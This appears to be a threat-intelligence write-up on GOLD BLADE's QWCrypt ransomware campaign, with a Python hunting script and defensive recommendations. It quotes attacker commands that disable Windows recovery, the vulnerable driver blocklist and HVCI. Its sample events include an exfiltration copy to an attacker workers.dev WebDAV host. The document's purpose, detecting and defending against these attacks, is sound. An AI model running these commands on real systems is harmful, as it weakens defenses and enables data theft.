GOLD BLADE’s QWCrypt: A New Era of Targeted Ransomware Attacks
GOLD BLADE is a threat group that has moved from pure espionage to a hybrid model combining data theft with targeted ransomware deployment. Central to this shift is a custom ransomware tool known as QWCrypt, which the group now uses to add encryption-based extortion to the leverage it already gains from stolen data.
From Espionage to Ransomware: The Evolution of GOLD BLADE
Historically, GOLD BLADE’s operations, tracked under the campaign identifier STAC6565, were primarily focused on espionage activities. Between early 2024 and mid-2025, the group targeted nearly 40 organizations, with a pronounced emphasis on Canadian entities spanning sectors such as services, manufacturing, retail, and technology.
In a strategic pivot, GOLD BLADE has now integrated ransomware into their arsenal, utilizing QWCrypt to encrypt critical data and demand ransoms. This evolution signifies a broader trend among cybercriminals who are diversifying their methods to maximize financial gain.
Sophisticated Delivery Mechanisms: Exploiting Trusted Platforms
GOLD BLADE’s initial access is unusually well targeted. Rather than sending conventional phishing email, the group abuses reputable recruitment platforms such as Indeed, JazzHR, ADP, and LinkedIn, submitting counterfeit resumes in PDF format that either contain the first malware stage or send human resources staff to deceptive “Safe Resume Share” portals built to deliver the malicious content.
This method is particularly insidious because it integrates seamlessly into standard hiring workflows, allowing the malicious resumes to bypass many email security filters undetected. The trust associated with these platforms further enhances the likelihood of successful infiltration.
The RedLoader Delivery Chain: A Multi-Stage Attack
Opening a malicious resume starts a multi-stage infection chain. The initial payload is typically a ZIP archive containing either a shortcut file disguised as a PDF or an ISO image. Running it executes a renamed copy of the legitimate ADNotificationManager.exe, which sideloads a malicious RedLoader DLL (observed as srvcli.dll or netutils.dll) loaded through rundll32.exe from a WebDAV share hosted behind Cloudflare Workers. Because the DLL is fetched from a remote share, the rundll32.exe command line carries a UNC path pointing at a workers.dev host, which makes it a useful hunting pivot.
The first-stage DLL establishes communication with the command-and-control (C2) server and creates scheduled tasks that download subsequent payloads into the user’s AppData\Roaming directory under innocuous names such as BrowserEngineUpdate_. The tasks launch those payloads through legitimate Windows utilities such as pcalua.exe (the Program Compatibility Assistant launcher), so the parent of the malicious process is a signed Microsoft binary and simple parent-child detections are less likely to fire.
A batch script then deploys Sysinternals AD Explorer to perform network reconnaissance, compresses the findings using 7-Zip, and uploads the data to attacker-controlled WebDAV servers, such as local.chronotypelabs[.]workers[.]dev.
QWCrypt Deployment: The Final Blow
When GOLD BLADE decides to deploy QWCrypt, it distributes an encrypted 7-Zip archive over SMB to multiple servers in the target network. A launcher script first checks that the group’s Terminator-based service for killing anti-virus processes is running, then disables system recovery and runs the QWCrypt locker with specific parameters:
```
rem Turn off the Windows Recovery Environment for the default boot entry
bcdedit /set {default} recoveryenabled no
rem Start the QWCrypt locker in verbose mode; the value passed to -key is not reproduced here
qwc_537aab1c.exe -v -key
```
The Terminator service utilizes a vulnerable Zemana AntiMalware driver (term.sys, later renamed) to terminate protected processes and weaken core Windows defenses by modifying critical registry values:
```
rem reg.exe syntax: both values are set to 0, which turns the protection off
rem Disables Microsoft's vulnerable driver blocklist so the Zemana driver can load
reg add HKLM\SYSTEM\CurrentControlSet\Control\CI\Config /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0x0 /f
rem Disables Hypervisor-Enforced Code Integrity (HVCI)
reg add HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity /v Enabled /t REG_DWORD /d 0x0 /f
```
A final cleanup script runs QWCrypt with hypervisor-specific flags where necessary, deletes shadow copies to prevent data recovery, and clears PowerShell history, leaving only encrypted data and a ransom note titled !!!how_to_unlock_qwCrypt_files.txt in its wake.
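The RedLoader chain above and the QWCrypt deployment sequence in this section leave a small, specific set of host artefacts: rundll32.exe loading a DLL from a workers.dev WebDAV share, pcalua.exe launching a payload from AppData\Roaming, scheduled tasks named with the BrowserEngineUpdate_ prefix, AD Explorer reconnaissance, the bcdedit recovery change, the two registry values Terminator zeroes, and the ransom note. The Python below is an added example (not code from this page or from the researchers tracking GOLD BLADE) that encodes those observations as hunting rules and runs them over constructed Sysmon-style events. The `Event` shape, the rule names, the host and user names, the task-name suffix and the sample command lines are assumptions made for the example; the binaries, domain, registry values and ransom-note name are the ones the page reports.

```python
"""Hunting rules for the RedLoader delivery chain and the QWCrypt deployment
sequence described above, run over constructed Sysmon-style events.
The indicators come from the page; the sample events are made up."""
import ntpath
from dataclasses import dataclass

# Indicators taken from the page. The task name is reported only as a prefix,
# so it is matched as one. All comparisons are case-insensitive.
C2_DOMAIN_SUFFIX = ".workers.dev"          # WebDAV shares behind Cloudflare Workers
TASK_NAME_PREFIX = "browserengineupdate_"   # scheduled tasks staging into AppData\Roaming
RANSOM_NOTE_NAME = "!!!how_to_unlock_qwcrypt_files.txt"
DEFENSE_VALUES = {                          # registry values Terminator sets to 0
    r"hklm\system\currentcontrolset\control\ci\config\vulnerabledriverblocklistenable",
    r"hklm\system\currentcontrolset\control\deviceguard\scenarios"
    r"\hypervisorenforcedcodeintegrity\enabled",
}


@dataclass
class Event:
    kind: str          # "process", "registry", "task" or "file"
    image: str = ""    # process image path (process events only)
    cmdline: str = ""  # full command line (process events only)
    target: str = ""   # registry value path, task name or file path
    data: str = ""     # data written (registry events only)


def is_zero_dword(data: str) -> bool:
    """True for "0", "0x0" and similar spellings of a zero DWORD."""
    try:
        return int(data.strip(), 0) == 0
    except ValueError:
        return False


def rules_for(ev: Event) -> list[str]:
    """Return the names of every rule the event trips (empty if benign)."""
    hits: list[str] = []
    exe = ntpath.basename(ev.image).lower()
    cmd = " ".join(ev.cmdline.lower().split())   # collapse whitespace
    tgt = ev.target.lower()
    if ev.kind == "process":
        # Stage 1: rundll32 loading the RedLoader DLL straight off a WebDAV share.
        if exe == "rundll32.exe" and ("davwwwroot" in cmd or C2_DOMAIN_SUFFIX in cmd):
            hits.append("rundll32_from_webdav")
        # Any process touching the Workers-hosted WebDAV infrastructure (C2 or exfil).
        if C2_DOMAIN_SUFFIX in cmd:
            hits.append("workers_dev_webdav")
        # pcalua.exe used as a proxy to launch a payload staged under AppData\Roaming.
        if exe == "pcalua.exe" and "\\appdata\\roaming\\" in cmd:
            hits.append("pcalua_proxy_exec_appdata")
        # Sysinternals AD Explorer (ADExplorer.exe / ADExplorer64.exe) used for recon.
        if exe.startswith("adexplorer"):
            hits.append("ad_explorer_recon")
        # Recovery environment switched off ahead of the locker.
        if exe == "bcdedit.exe" and "recoveryenabled no" in cmd:
            hits.append("bcdedit_recovery_disabled")
    elif ev.kind == "registry":
        if tgt in DEFENSE_VALUES and is_zero_dword(ev.data):
            hits.append("defense_impairment_registry")
    elif ev.kind == "task":
        if ntpath.basename(tgt).startswith(TASK_NAME_PREFIX):
            hits.append("scheduled_task_browserengineupdate")
    elif ev.kind == "file":
        if ntpath.basename(tgt) == RANSOM_NOTE_NAME:
            hits.append("qwcrypt_ransom_note")
    return hits


def hunt(events: list[Event]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule tripped, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in rules_for(ev)]


# Constructed sample telemetry (assumption): host paths, the user name, the task
# suffix and the command lines are invented; the binaries, domain, registry
# values and ransom-note name are those the page reports.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\rundll32.exe",
          r'rundll32.exe "\\local.chronotypelabs.workers.dev@SSL\DavWWWRoot\srvcli.dll",#1'),
    Event("task", target=r"\BrowserEngineUpdate_7f2"),
    Event("process", r"C:\Windows\System32\pcalua.exe",
          r"pcalua.exe -a C:\Users\hr.user\AppData\Roaming\BrowserEngineUpdate_7f2\update.exe"),
    Event("process", r"C:\Temp\ADExplorer.exe", r'ADExplorer.exe -snapshot "" C:\Temp\ad.dat'),
    Event("process", r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c copy C:\Temp\ad.7z \\local.chronotypelabs.workers.dev@SSL\DavWWWRoot\ad.7z"),
    Event("process", r"C:\Windows\System32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    Event("registry", target=r"HKLM\SYSTEM\CurrentControlSet\Control\CI\Config\VulnerableDriverBlocklistEnable", data="0x0"),
    Event("registry", target=r"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity\Enabled", data="0"),
    Event("file", target=r"C:\Users\Public\!!!how_to_unlock_qwCrypt_files.txt"),
    Event("process", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),   # benign
    Event("registry", target=r"HKLM\SOFTWARE\Contoso\Setting", data="0"),           # benign
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The rules are deliberately narrow: the registry rule fires only when one of the two named values is set to zero, so routine policy refreshes that write 1 stay silent, and the task rule keys on the reported name prefix rather than on scheduled-task creation in general. In a real deployment the same predicates would be expressed in the SIEM's query language over process-creation (Sysmon event 1), registry-set (event 13), file-create (event 11) and scheduled-task audit events.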
Data Exfiltration: A Dual Threat
Beyond encryption, GOLD BLADE employs data exfiltration tactics to enhance their extortion leverage. Stolen data is archived using 7-Zip and transmitted over WebDAV via Cloudflare Workers domains. This strategy ensures that even if the encryption process is thwarted or the victim refuses to pay the ransom, the attackers can still threaten to leak sensitive information, thereby increasing the pressure on the victim to comply with their demands.
Implications and Recommendations
The emergence of GOLD BLADE and their deployment of QWCrypt underscore the evolving nature of cyber threats, where adversaries blend traditional espionage with ransomware to maximize their impact. Organizations, particularly those in sectors targeted by GOLD BLADE, must adopt a proactive and multi-layered defense strategy to mitigate the risk of such sophisticated attacks.
Key Recommendations:
1. Enhanced Email Security: Implement advanced email filtering solutions capable of detecting and quarantining malicious attachments and links, even those originating from trusted platforms.
2. Employee Training: Conduct regular cybersecurity awareness training for employees, emphasizing the risks associated with opening unsolicited attachments and clicking on unknown links, even from seemingly legitimate sources.
3. Network Segmentation: Segment networks to limit lateral movement by attackers, thereby containing potential breaches and minimizing the impact on critical systems.
4. Regular Backups: Maintain up-to-date offline or immutable backups of critical data and regularly test restoration. QWCrypt’s deployment script deletes shadow copies and disables Windows recovery before encryption, so local recovery points cannot be relied on.
5. Patch Management: Keep all systems and software updated with the latest security patches to close vulnerabilities that could be exploited by attackers. Note that the Terminator component abuses a legitimately signed but vulnerable Zemana driver rather than an unpatched bug, so patching alone does not stop it; keep Microsoft’s vulnerable driver blocklist and HVCI enforced and alert on any attempt to set VulnerableDriverBlocklistEnable or the HypervisorEnforcedCodeIntegrity Enabled value to 0.
6. Incident Response Planning: Develop and regularly update an incident response plan that includes procedures for dealing with ransomware attacks, including communication strategies and legal considerations.
By implementing these measures, organizations can enhance their resilience against the sophisticated tactics employed by groups like GOLD BLADE and better protect their critical assets from emerging cyber threats.